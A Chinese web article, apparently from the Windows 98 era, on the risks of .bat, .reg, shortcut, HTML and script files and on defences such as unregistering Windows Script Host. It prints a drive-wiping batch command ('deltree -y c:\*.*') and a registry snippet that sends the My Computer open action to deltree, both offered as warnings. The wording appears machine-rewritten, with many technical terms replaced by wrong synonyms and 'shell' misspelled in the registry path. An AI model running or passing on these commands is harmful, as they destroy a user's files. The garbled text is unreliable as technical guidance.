危险文件防备办法[网络技术]

大家知道.bat是DOS批处理号令文件,我们可以用记事本编辑增添一些号令,运行它今后系统就会自动逐条履行号令.所以一些危险的号令就会被某些有心人写进批处理文件中去,在网上到处传达搞破坏,比方在hello.bat中写进:

　　deltree -y c:\*.*

　　接下来的事情就是你赶忙拿条手巾擦眼泪吧.从这个意义上说它比病毒还要毒辣.

　　别的,注册表文件.reg也可以被编写进近似的代码,比方我们编辑一个hello.reg:

　　REGEDIT4

　　[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\sell\open\command]@="command/c deltree"

　　双击履行它导入注册表,我胆怯没敢试,哪位胆子大请试试看,请奉告我答案,嘻嘻~~（注:千万不要去试,很危险的）.

　　近似的,在.hlp（帮忙文件）、.pif（指向DOS的快速方法）、.lnk（WINDOWS快速方法）这些文件中也可以写入危险的号令,假如不当心履行了那就危险了.防备以上调用DOS号令举行破坏的文件,被动的做法是通过将format、deltree这类号令改名换姓.

　　HTML网页文件对大家来说再熟习不过了,HTML本身没有危害的,但HTML有一个调用外部对象的脚本运行的功效,可以调用可以读写别的文件的外部对象,所以也就被用心不良者操纵,把带有恶意有脚本嵌入HTML中,当你翻开包含有这类脚本和ActiveX控件的网页时,HTML利用文件中的可履行程序就会自动运行,接下来就是……所以有时当IE提醒“该页上某些软件大概不安全,倡议不要运行”,最好不要点“肯定”.

　　但是像.VBS、.JS这类脚本文件病毒就更毒、更狠了,因为它们在破坏历程中几近无声无息,运行它们时没有任何提醒.去年风光一时“爱虫”属于此类病毒,近来大名鼎鼎的“HAPPY TIME”乃至只要用鼠标移动到它的邮件名上,IE的预览功效便可激活此病毒,好利害!象这样的文件还有.wsc、.wsf、vbe、jse,它们有一个共同点就是用 Wscript.exe来履行,也就是WINDOWS的“批处理”——Windows scripting host.

　　防备此类病毒的办法就是将Windows scripting host卸载掉,具体办法是:我的电脑→掌握面板→增添/删除程序→安装WINDOWS→附件→具体资料→Windows scripting host→肯定.其实还有一种办法更简单,顺次键入下面两段号令:regsvr32/u wshom.ocx回车、regsvr32/u wshext.dll回车,便可以把注册表中.wsh对象的注册值删掉.这样那些必须依靠对象运行的病毒就因为找不着对象而无法运行下去.

　　别的,这些病毒基本都是操纵Outlook来散布的,它们常常会自动往地址簿中的EMAIL地址发送以自已为附件的邮件.所以我们也可以把Outlook供应应外部脚本调用的接口对象给禁掉,具体作法是:regsvr32/u msoe.dll.假如要恢复利用,只要在以上的号令中去掉/u再运行一次便可.

　　在此,倡议您在浏览一些不熟习的网站时最好把IE的安全级别设为高级,把ActiveX控件和插件关闭,将Active scripting屏蔽掉.办法是:运行IE→工具→Internet选项→安全→自定义级别,对全部ActiveX相关选项选“禁用”,对全部JS脚本也挑选“禁用”选项.关于根源不明的邮件,分外是含有附件的邮件不要简单翻开,更不要履行附件里面的文件.

　　安装网络防火墙也是非常必要的（分外是拔号上网用户）,至少可以在你的电脑和网络之间筑起一道防线,防火墙软件举荐您用国产的“天网个人防火墙”,免费,占用系统资源也不多.再有,平常还要翻开杀毒软件的及时监控

[1] [2]  下一页